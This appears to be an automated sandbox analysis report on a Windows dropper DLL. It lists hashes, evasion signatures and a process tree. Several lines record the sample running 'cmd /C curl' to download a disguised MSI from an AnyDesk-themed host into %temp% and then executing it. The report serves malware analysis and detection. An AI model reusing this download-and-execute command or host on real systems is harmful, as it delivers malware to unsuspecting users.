Windows Analysis Report
SecuriteInfo.com.Win64.DropperX-gen.15394.30671.exe

Overview

General Information

Sample Name: SecuriteInfo.com.Win64.DropperX-gen.15394.30671.exe (renamed file extension from exe to dll)
Analysis ID: 756307
MD5: 977f29431f9233f22f51b3d27e8abc28
SHA1: 7999931d13db79b25e8660065fbbe5288dc04d7e
SHA256: b875add23dbf8b2942af53c0610c779c4263dacdf69186a3d4c9c09c3ebebdbe
Tags: exe

Detection

Score: 2
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Sample execution stops while process was sleeping (likely an evasion)
Queries the volume information (name, serial number etc) of a device
May sleep (evasive loops) to hinder dynamic analysis
Creates a process in suspended mode (likely to inject code)

Classification

Source: SecuriteInfo.com.Win64.DropperX-gen.15394.30671.dll Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT
Source: Binary string: C:\ss2\Projects\MsiWrapper\MsiCustomActions\Release\MsiCustomActions.pdb source: spclwow78x.msi.12.dr
Source: unknown DNS traffic detected: queries for: anydesk10.hospedagemdesites.ws
Source: global traffic HTTP traffic detected: GET /UIServices.jpg HTTP/1.1 Host: anydesk10.hospedagemdesites.ws User-Agent: curl/7.55.1 Accept: */*
Source: curl.exe, 00000013.00000002.314169873.0000025DD86A0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://anydesk10.hospedagemdesites.ws/UIServices.jpg
Source: cmd.exe, 00000005.00000002.312230580.000002F48A740000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000006.00000002.312615492.0000025D5B2C0000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000010.00000002.314800313.0000017F1AD40000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://anydesk10.hospedagemdesites.ws/UIServices.jpg-o%temp%
Source: curl.exe, 0000000B.00000002.312202696.000001DCAC560000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000000C.00000002.311774782.00000213305C0000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000013.00000002.314169873.0000025DD86A0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://anydesk10.hospedagemdesites.ws/UIServices.jpg-oC:
Source: curl.exe, 0000000C.00000003.311639977.00000213305CF000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000000C.00000002.311799465.00000213305D2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://anydesk10.hospedagemdesites.ws/UIServices.jpg4
Source: curl.exe, 0000000C.00000003.311639977.00000213305CF000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000000C.00000002.311799465.00000213305D2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://anydesk10.hospedagemdesites.ws/UIServices.jpg8
Source: C:\Windows\System32\curl.exe File created: C:\Users\user\AppData\Local\Temp\spclwow78x.msi
Source: SecuriteInfo.com.Win64.DropperX-gen.15394.30671.dll Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Windows\System32\loaddll64.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: classification engine Classification label: clean2.winDLL@35/4@3/1
Source: C:\Windows\System32\loaddll64.exe Process created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\SecuriteInfo.com.Win64.DropperX-gen.15394.30671.dll,xlAutoOpen
Source: unknown Process created: C:\Windows\System32\loaddll64.exe loaddll64.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win64.DropperX-gen.15394.30671.dll"
Source: C:\Windows\System32\loaddll64.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\loaddll64.exe Process created: C:\Windows\System32\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win64.DropperX-gen.15394.30671.dll",#1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win64.DropperX-gen.15394.30671.dll",#1
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\System32\cmd.exe cmd /C curl http://anydesk10.hospedagemdesites.ws/UIServices.jpg -o %temp%\spclwow78x.msi
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\System32\cmd.exe cmd /C %temp%\spclwow78x.msi
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\curl.exe curl http://anydesk10.hospedagemdesites.ws/UIServices.jpg -o C:\Users\user\AppData\Local\Temp\spclwow78x.msi
Source: C:\Windows\System32\loaddll64.exe Process created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win64.DropperX-gen.15394.30671.dll",xlAutoOpen
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5284:120:WilError_01
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4764:120:WilError_01
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1408:120:WilError_01
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6000:120:WilError_01
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3712:120:WilError_01
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5296:120:WilError_01
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3972:120:WilError_01
Source: C:\Windows\System32\curl.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: SecuriteInfo.com.Win64.DropperX-gen.15394.30671.dll Static PE information: Image base 0x180000000 > 0x60000000
Source: SecuriteInfo.com.Win64.DropperX-gen.15394.30671.dll Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\loaddll64.exe TID: 2312 Thread sleep time: -120000s >= -30000s
Source: curl.exe, 0000000B.00000003.312004880.000001DCAC56F000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000000B.00000002.312222162.000001DCAC572000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000000C.00000003.311639977.00000213305CF000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000013.00000002.314228700.0000025DD86AB000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Windows\System32\loaddll64.exe Thread delayed: delay time: 120000
Source: C:\Windows\System32\cmd.exe Queries volume information: C:\ VolumeInformation